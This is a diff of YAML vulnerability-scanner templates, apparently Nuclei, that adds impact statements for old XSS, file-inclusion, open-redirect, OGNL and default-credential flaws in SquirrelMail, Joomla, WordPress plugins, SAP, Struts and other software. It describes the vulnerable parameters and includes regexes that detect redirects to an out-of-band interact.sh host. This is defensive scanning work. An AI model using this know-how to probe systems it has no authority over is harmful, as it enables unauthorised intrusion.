# digest: 490a00463044022058d9a8ffc9ad0c9eb0fa65e129eec136d44e8e6582b68665220d55745cff08270220209369d1debe9d289316990990aee95bdaa71cd748bcd23d1f7189442c298347:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502201446b3c9bf46dead91bf4ef4ad77cbe180d6d69fb175901a10fa0c1ede45e8640221009f8fada5bf28bf8ede431e3ef75a13367f4164a18df286db6e1528ed038181da:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: dhiyaneshDk author: dhiyaneshDk
severity: high severity: high
description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.
remediation: | remediation: |
Upgrade to a patched version of SquirrelMail or apply the necessary security patches to mitigate the XSS vulnerability. Upgrade to a patched version of SquirrelMail or apply the necessary security patches to mitigate the XSS vulnerability.
reference: reference:
@ -53,4 +55,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100919662cf99fc2c8685a185341929e70c52f2d6e4708bffe8294fe45d56f7cb81022071b199174fe64ab885ef44d2c7d1e298ea1ee34b6eab5737b7afb1bd0b713799:922c64590222798bb761d5b6d8e72950 # digest: 4a0a004730450220097cefba0b33bb087a8dba970ed43866b17c92bfc316e2e3d619b9b6485b57710221009ad2de84214b6c521984839454d0766d906957945e2b51dce527cd4c0cc82c50:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: dhiyaneshDk author: dhiyaneshDk
severity: medium severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php. description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, phishing attacks, or defacement of the SquirrelMail interface.
remediation: Upgrade to the latest version. remediation: Upgrade to the latest version.
reference: reference:
- https://www.exploit-db.com/exploits/24068 - https://www.exploit-db.com/exploits/24068
@ -46,4 +48,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a0046304402205d3c4477a61a53a5207dd95d10b69b27e255779626d269dd24c329d22d574969022037aecc3ef5111112878affc3d64765c06c484c318e8435b97dcf1f44c9c9daac:922c64590222798bb761d5b6d8e72950 # digest: 4b0a004830460221009838e283e3afa06a62182a21bc8b0059f223c7716b521ee426f5a5971f3feadf022100dd82c1e652cb490cb66a1a96bc0aca2beecdf45fedf86f75b5376ac8fc69c6d3:922c64590222798bb761d5b6d8e72950

View File

@ -6,6 +6,8 @@ info:
severity: medium severity: medium
description: | description: |
Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php. Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php.
impact: |
Successful exploitation of these vulnerabilities could lead to unauthorized access, phishing attacks, and potential data theft.
remediation: | remediation: |
Upgrade to a patched version of Open Bulletin Board (OpenBB) or apply necessary security patches to mitigate the vulnerabilities. Upgrade to a patched version of Open Bulletin Board (OpenBB) or apply necessary security patches to mitigate the vulnerabilities.
reference: reference:
@ -37,4 +39,4 @@ http:
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
# digest: 4a0a004730450220464a4d9ce1d6cbeaf71f551a06fd319a5a15203f7c40b1228809ef413ce6d869022100cb853dd541a12cbe5b12d10daaebc247d1b20e32d173b410d5191367fb6f5839:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100aa37066896608be1f1389ed813b9756b52f89f2581a494bf04c0e91f743d7cd3022012425b62227648da21636d2b3acaa1fdb865e29f57e39c13c84e0e2511f4c908:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: CasperGN author: CasperGN
severity: medium severity: medium
description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696). description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
impact: |
The vulnerability can lead to the disclosure of sensitive information, potentially compromising user privacy and system security.
remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files. remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
reference: reference:
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
@ -42,4 +44,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100c31e97e6801605f82c05e1819cf99bdb1e7ad21b859fbf96bab1d67b1496832302201de7a5c5f9fd1f832a121691d1c419464c4d56aa1261f00b415c933633470308:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502202fa68c993471257cf8942b7addbd0c8ba10500cf91c42f00109404cec47f6af0022100e5d9e9567e00ffecb85211757541b21325517ca1cba3705fa3c8e4437bf71706:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: pikpikcu author: pikpikcu
severity: critical severity: critical
description: Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access. description: Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access.
impact: |
An attacker can gain unauthorized access to sensitive administrative functions and potentially compromise the entire system.
remediation: | remediation: |
Apply the latest security patches or upgrade to a patched version of Horde Groupware to fix the vulnerability. Apply the latest security patches or upgrade to a patched version of Horde Groupware to fix the vulnerability.
reference: reference:
@ -45,4 +47,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100c038f1228140ac219d52db4ac935001c95f9c1d446165668109ce4beee89ce54022053555ab9030c57883e97f6b5387e415d1116add7b8c7d61fcf0f53f8f63abb6d:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022012df863c30fb119eab34b1e075cfc549f79b962d5ee0256cc191605f184b042c022100ee6d6910021f8368041415f1c29568a224afa0bd4c90711c6ecef91e15f67a13:922c64590222798bb761d5b6d8e72950

View File

@ -6,6 +6,8 @@ info:
severity: medium severity: medium
description: | description: |
frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter. frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter.
impact: |
An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.
remediation: | remediation: |
Apply the latest security patches and updates provided by SAP to fix the open redirect vulnerability. Apply the latest security patches and updates provided by SAP to fix the open redirect vulnerability.
reference: reference:
@ -40,4 +42,4 @@ http:
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
# digest: 490a0046304402201ed65f33515c85457e0554acc0db27813e67680002c76547791a87a2528ee8f702200cf156ab25abae0ba9b6284d127206b2afbbf1449ef60b0bd8d1643a3ab35938:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100bd85215e179a268944da628fd2825c25be84f1d781f2eb54871fa7e3e13d9e9e022100d3ddb1c0a27197923318f0dd20a6ba42024cfd43b86ef1ab690f72558f0d6c36:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: geeknik author: geeknik
severity: medium severity: medium
description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter. description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: | remediation: |
Upgrade to a version of Cofax that is not affected by this vulnerability or apply the necessary patches provided by the vendor. Upgrade to a version of Cofax that is not affected by this vulnerability or apply the necessary patches provided by the vendor.
reference: reference:
@ -40,4 +42,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a004630440220109614eef224949e56be06ed96b7253bf9eeaaaca6b3e4d13bad94f187f50763022025be825f048689d4e2fb40c8cab4f5be2a16e56a263e77a4c10b8b718f948edc:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502207b167d92c80698ced12089ab60b5599c68ac644764fc7c498b54ba3b419645a7022100df03e54fcb0545995de5efa160937f4291cc667f1492d78e48ce8afcff374056:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: geeknik author: geeknik
severity: medium severity: medium
description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated. description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: | remediation: |
Upgrade to a patched version of Cherokee HTTPD or apply the necessary security patches to mitigate the XSS vulnerability. Upgrade to a patched version of Cherokee HTTPD or apply the necessary security patches to mitigate the XSS vulnerability.
reference: reference:
@ -45,4 +47,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a00463044022033ff4b2d0618993f110bdcee1826f352569694a911159307a8f47963b4726556022038d273a79b3532c7f80935bec832c34c7892f005e3108ecc80ca91912b3eb12e:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502200a624286010449dfbca736566eca4b83ef242b54957df99d637e088e9f74d226022100df79ccce801ecbe05018cb6c9e29bc7f6acf5836a0f68bc4640d5c55a8fdbdbf:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: dhiyaneshDk author: dhiyaneshDk
severity: high severity: high
description: SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. description: SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.
impact: |
An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
remediation: | remediation: |
Upgrade Squirrelmail to a version higher than 1.4.6 or apply the necessary patches to fix the LFI vulnerability. Upgrade Squirrelmail to a version higher than 1.4.6 or apply the necessary patches to fix the LFI vulnerability.
reference: reference:
@ -41,4 +43,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100cf681f51c8fd7ad8f71ddb5ab7fbf70ab26af8ef9f4e1eecf899ef7e15a9cfc7022100fd0d57febf53d04624632cee41a8d0d9e2d2fccd8fb7fa76c099ec12679f4da0:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022070351a9e8db3cd73242680b18ba040226de4685b2c47e1382a982513fb0fc4f6022100e11c42b749f6d407caa47bb25997db8749ff4658e5d89ccf2215774153751083:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action. description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
remediation: | remediation: |
Upgrade to the latest version of Joomla! RSfiles or apply the necessary patches provided by the vendor. Upgrade to the latest version of Joomla! RSfiles or apply the necessary patches provided by the vendor.
reference: reference:
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a004730450220712fc391a3e3be1f9f89f83c89ca00e016a1ae009e593ef7f256bc272a71792f022100eddfcc0868a4e91ff4b82eaa8fa52e5f192d150f48f12b868d02d656b1a5f363:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100b096332d183a0234d0cbd3bfbc4b5149fddfbfe961ca49519ef85975a12413e50221008eee0c4a8fbdcd33a40800400dd5bd396f02ffb63cb375616260a0d10b0fce8d:922c64590222798bb761d5b6d8e72950

View File

@ -6,6 +6,8 @@ info:
severity: medium severity: medium
description: | description: |
Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character. Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character.
impact: |
Remote code execution
remediation: | remediation: |
Update to the latest version of Apache Struts2 Update to the latest version of Apache Struts2
reference: reference:
@ -49,4 +51,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022063c92b81235f315f81680c3e5e93dc814dfe125814e43dcb6cff373d90d06df2022100a730d9a5439ccba872f1932b6625658746e1dedae50d3d88b40a0e484f9399cd:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100efb00dfbe2fbe5543741c32ac6e81e36f307f5d67597644c0e036fb51692ea570220191deb545db561480334ffe98f010ae2ca82883fae8e71451c75675f56ee4501:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: dhiyaneshDK author: dhiyaneshDK
severity: medium severity: medium
description: phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865. description: phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: | remediation: |
Upgrade to a patched version of phpPgAdmin or apply the necessary security patches provided by the vendor. Upgrade to a patched version of phpPgAdmin or apply the necessary security patches provided by the vendor.
reference: reference:
@ -50,4 +52,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100ad3097a5f6494d45fc14b874469d62f42b9c84b273bc97b0688766f2d713b972022100e9ef7b1933fd6aa3ae8272f3d178f59cab4f4f5998bf9faaa1791557fec4245c:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100dc5ae294908867ea9cfb3d84402f9150ea3eba52581a1435594505653c59b4a902202749fa215a1e51172d887e6a52ca776e6530f8537f8df687fba7ed249836eb6e:922c64590222798bb761d5b6d8e72950

View File

@ -6,6 +6,8 @@ info:
severity: high severity: high
description: | description: |
PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter. PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation.
remediation: | remediation: |
Update WordPress Sniplets to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability. Update WordPress Sniplets to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability.
reference: reference:
@ -45,4 +47,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100db5f69276d7187ac5e9ccd8fd496e438c208ccece891c346d8bde457e12843ed02204a3892717752fadf89f73626fb71fb105db24ea7b2a8f774024dc523cbaa3831:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502202baf6dbc687b03d671808dd265b4bd483e0db5122a79101074736b0280a3b8a6022100fe1672451273fca5b4feda5dac2ed3961821928bc670fa6690bb5a5816910bd2:922c64590222798bb761d5b6d8e72950

View File

@ -6,6 +6,8 @@ info:
severity: medium severity: medium
description: | description: |
WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php. WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: | remediation: |
Update WordPress Sniplets plugin to the latest version available, which addresses the XSS vulnerability. Update WordPress Sniplets plugin to the latest version available, which addresses the XSS vulnerability.
reference: reference:
@ -48,4 +50,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a00463044022009e0335783eef020014410f2e510ddaeb0729cbd858f61bd7142e3099b53a47e022064cfb538a41735c933bef0eec4be787cb021a3e82f3ed2904ecaecb8b3f60015:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100d8a1715cd99d2a316fc96a49ad96d5fcb9e60d314fa0227f341da5c5964d63d1022034fc66ce4d2ff88c7bbaad9997d6a4da683cffe1a97d693b84d3918d4654d340:922c64590222798bb761d5b6d8e72950

View File

@ -6,6 +6,8 @@ info:
severity: medium severity: medium
description: | description: |
Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter. Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter.
impact: |
An attacker can exploit this vulnerability to trick users into visiting malicious websites, leading to potential phishing attacks.
remediation: | remediation: |
Apply the necessary security patches or upgrade to a newer version of Microsoft Exchange Server. Apply the necessary security patches or upgrade to a newer version of Microsoft Exchange Server.
reference: reference:
@ -40,4 +42,4 @@ http:
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# digest: 4b0a00483046022100ea8393f7c2fcb36e817067e028b4eb79d7da58d6cb3df979f437089ae9ec5b44022100b5b40586f3165ddb2cbf5e9678ec12ed29ef4c8039ab93e0a5b04f0aa31a595e:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022042de3ed0e9fbe496c588f3edb67152006b98090716fbf000556dc8edaf836bf9022056dc3d31d210a950d8ddc0f728c2e9712fe5ec45775636b0fbb655b92a58e095:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: unstabl3 author: unstabl3
severity: medium severity: medium
description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter. description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: | remediation: |
Upgrade to a patched version of AppServ Open Project (>=2.5.11) or apply the necessary security patches provided by the vendor. Upgrade to a patched version of AppServ Open Project (>=2.5.11) or apply the necessary security patches provided by the vendor.
reference: reference:
@ -45,4 +47,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a0047304502204c02560c678b8087c28bfeed200bf5f25dc9f74261527fa9d7a2fb3b146becf8022100dee5ed65d2accf8d9f2bd7d38d04efb7b5eb7e70f8a26b9ebb580f3c5279e580:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022042436195e99587054a6a10ee089470c1fadab498fe1b556fc0cdcde579d92d5602201b1af0719bba0f8007ca800e10004e6be93d7ec53b7ec4fe0f627c5372dcdca9:922c64590222798bb761d5b6d8e72950

View File

@ -6,6 +6,8 @@ info:
severity: medium severity: medium
description: | description: |
CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number. CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
remediation: | remediation: |
Upgrade CMSimple to a patched version or apply the necessary security patches provided by the vendor. Upgrade CMSimple to a patched version or apply the necessary security patches provided by the vendor.
reference: reference:
@ -45,4 +47,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a0047304502203023e84e303b4688ad150f602ceea289a63ee29df8e12b9f39e6ebac23772d86022100f6e29101c5642afe45708838994bce4898278fe0adfb03b7b2124b7f0ceef30f:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100bbdf518966c75a44af19b519ed2a3d642aced2b7aaff600afa01c21c5509066f0221009c184332053f598d45bba3340388cadda4c7c8b8dabdb66884deea62912365b3:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: critical severity: critical
description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php. description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
remediation: | remediation: |
Upgrade to a patched version of Joomla! Image Browser or apply the necessary security patches to mitigate the LFI vulnerability. Upgrade to a patched version of Joomla! Image Browser or apply the necessary security patches to mitigate the LFI vulnerability.
reference: reference:
@ -40,4 +42,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a0046304402202feaa0d486d5070e9e7bfd4efd73233251cc5396a98dfc67390f6a5630c2e633022010d10fb2d53407cc4f72002217767dfdf8eef452f44b74b5fe6c27a5029e9c99:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402206851937b7e99292685636e8eef2e6b0b33d2b8d19446ba160013767d605e5fbb0220103e5f70323feb34b2b691f0e0fc3c7c89a457f0e351756ea16091a69d38e1c7:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: dhiyaneshDK author: dhiyaneshDK
severity: medium severity: medium
description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php. description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
impact: |
An attacker can exploit this vulnerability to read sensitive files on the server and potentially execute arbitrary code.
remediation: | remediation: |
Upgrade phpPgAdmin to a version higher than 4.2.1 or apply the necessary patches provided by the vendor. Upgrade phpPgAdmin to a version higher than 4.2.1 or apply the necessary patches provided by the vendor.
reference: reference:
@ -42,4 +44,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022033f0c2315a611613fda0fb73c18a12113fa19156574aefbf477b092d512c58710221009494212e159047a9d4f26d0d900af8c3a6c04abb2086da29e47e858052513990:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100ad5280aa6eac0929495f63d9882328a6c7dfd9bc0e135183d17a7c4cbc1e741e02203c987c6747a3bd616cd71adf3e491eeaee52d52f4dc1c2e0d5041d063956d83c:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
remediation: | remediation: |
Update Joomla! ionFiles to the latest version or apply the provided patch to mitigate the vulnerability. Update Joomla! ionFiles to the latest version or apply the provided patch to mitigate the vulnerability.
reference: reference:
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100c9a4ffd62555b868c4f74ccec0a683f901fce786056f157a2b745ae2d175c6c902200803e8831676633b7e4035222f60a624ca213872992d2bdf3e6024bc574be95a:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100e01b4968812ad7ad9b056cd634b2606c5650c02cf33012f5aef863b48bc969340220533ab0def58e9b6e81e56a8ae60e8116c2a03ef694aa21fc9601afd4798bce87:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter. description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
remediation: | remediation: |
Update Joomla! Component RWCards to the latest version to mitigate the vulnerability. Update Joomla! Component RWCards to the latest version to mitigate the vulnerability.
reference: reference:
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a0048304602210095f2553fda2f3bf455c5d6646d07cd536a1461506147b3d9f7c73b2c95aaa238022100cd50381518519c3903ec58739cca597e15d2f61c984c96e95876e26a79b860b7:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100aef3f723e04346fa7a2f8ac6c5abcf0174ca81a3aeb442367ae4d018f6ff964d0220337061d4274cc4456d6d13a49d5c1782ecb4b44cade9063e2389ffe246990c55:922c64590222798bb761d5b6d8e72950

View File

